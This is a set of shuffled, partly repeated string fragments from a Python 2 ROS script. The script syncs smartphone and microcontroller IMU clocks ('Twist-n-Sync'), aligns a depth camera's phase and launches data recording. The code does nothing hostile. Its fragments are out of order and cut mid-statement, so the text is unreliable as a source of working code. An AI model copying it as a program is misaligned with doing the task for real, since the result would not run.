"global remote remote = RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess =",
"+ bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string",
"mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x,",
"= data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1:",
"), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun",
"M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv')",
"depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num))",
": [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' :",
"\".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts)",
"running_subpr_list = [] for subpr in subpr_list: if subpr is not None: subpr.terminate()",
"print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M",
"1000 * (start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener =",
"data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1: print",
"data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def",
"as pd from io import StringIO from src.TimeSync import TimeSync2 import matplotlib as",
"TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun",
"mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' +",
"by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface",
"s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns",
"as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ','",
"'\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m'",
"Check if IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False",
"collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched",
"launched completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment process') input",
"a camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference,",
"\"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration = 4",
"True: print_master('Tap Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [],",
"mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration",
"depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp =",
"\", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0]",
"remote is not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) #",
"control global remote remote = RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess",
"= 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate the",
") os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape)",
"= '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC =",
"\", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time)",
"header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 #",
"bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the",
"s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time =",
"imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time =",
"+ string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: '",
"time_past = 0 while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past",
"signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote remote = RemoteControl(HOST) #",
"[mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2],",
"1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration = 4 # Wait",
"mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a camera frame and",
"#msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg)",
"Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9;",
"= [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None remote =",
"= data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z])",
"# Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() #",
"\"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time -",
"subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while True:",
"sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print",
"mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x',",
"def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC)",
"mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time)",
"while True: print_master('Tap Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [],",
"time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape,",
"= [] for subpr in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr)",
"'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path,",
"), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess)",
"= data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp",
"time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ','",
"get camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp",
"M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1],",
"data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in",
"def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if subpr",
"== 1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST",
"rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough')",
"to avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1)",
"mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp",
"'\\n' ) ''' # Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\"))",
": M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' :",
"= depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' +",
"print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result()",
"np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0]",
"1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time =",
"time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded",
"\", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" +",
"= subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording",
"import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal",
"2)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True)",
"print_master('Tap Enter to indicate the next sequence') while True: input = select.select([sys.stdin], [],",
"= sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired",
"import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np import",
"\"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \",",
"sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts",
"True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put",
"depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout reached.",
"bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string +",
"M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ),",
"visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1),",
"#msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: '",
"oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--')",
"None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if remote is",
"in running_subpr_list] if remote is not None: try: remote.stop_video() except: pass remote.close() sys.exit()",
"ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until",
"= time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time -",
"= \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start",
"'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL +",
"= None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat",
"class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN =",
"mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first measurement #",
"end_duration = 4 # Wait to avoid shaking time.sleep(1) # Gathering MCU and",
"ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 *",
"please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True,",
"= TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if",
"start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() #",
"Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C",
"'\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: '",
"+ data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data):",
"exit_codes = [p.wait() for p in running_subpr_list] if remote is not None: try:",
"back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs",
"mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some info",
"= TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap",
"sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener",
"omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset,",
"sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\",",
"Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess)",
"'\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN +",
"+= 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the next",
"# Wait until .launch launched completely time.sleep(2) while True: print_master('Tap Enter to start",
"# 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\",",
"Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay()",
"axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure",
"# Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess)",
"= [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common =",
"Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait()",
"= '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN",
"# Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1)",
"ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD +",
"depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering",
"Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:,",
"smartphone remote control global remote remote = RemoteControl(HOST) # Launching ROS data collection",
"time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts == None or depth_cam_ts ==",
"/ 1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset '''",
"latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while",
"= None mcu_cam_ts = None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data):",
"('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape,",
"imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:,",
"Some time needed to get camrera frame data by mcu.cpp time.sleep(0.1) # Send",
"\", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\")",
"M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase",
"along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process =",
"mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time,",
"import Imu, CameraInfo, TimeReference import numpy as np import pandas as pd from",
"remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat)",
"'/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv(",
"# Check if IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded ==",
"= '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE =",
"# Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr",
"print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out:",
"str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera frame data by mcu.cpp",
"plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener =",
"launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2)",
"mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition mcu_gyro_time",
"mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface",
"desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print",
"- mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \",",
"\", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \",",
"Ctrl+C to stop recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference,",
"mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x',",
"= 0.01 time_past = 0 while mcu_cam_ts == None or depth_cam_ts == None:",
"subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get",
"comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print",
"- mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1]",
"= '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL =",
"+ ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) '''",
"mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean",
"import sys import select import os HOST = None # The smartphone's IP",
"align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera frame",
"publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start video on s10 sm_remote_ts_ns,",
"= min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length],",
"== False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate()",
"',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for debugging path",
"3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data,",
") time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync has succeeded",
"HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING",
"if input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id",
"= select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value ==",
"<reponame>MobileRoboticsSkoltech/bandeja-wrapper import time from src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess",
"== 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def",
"' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while True: input",
"'\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m'",
"time.sleep(1) # Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs",
"command to mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some",
"as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys import select",
"main_duration = 4 end_duration = 4 # Wait to avoid shaking time.sleep(1) #",
"True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration)",
"msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap",
"with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000",
"UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' +",
"pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9",
"needed to get a camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset",
"cam_align_subprocess.wait() # Some time needed to get a camera frame and its info",
"align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed",
"info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global",
"MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER",
"mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common",
"end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking')",
"time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with everything and exit')",
":[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1],",
"Some time needed to get a camera frame and its info in mcu.cpp",
"\"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts",
"+ str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for debugging path =",
"bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m'",
"# The smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m'",
"start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a camera frame and its",
"None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9",
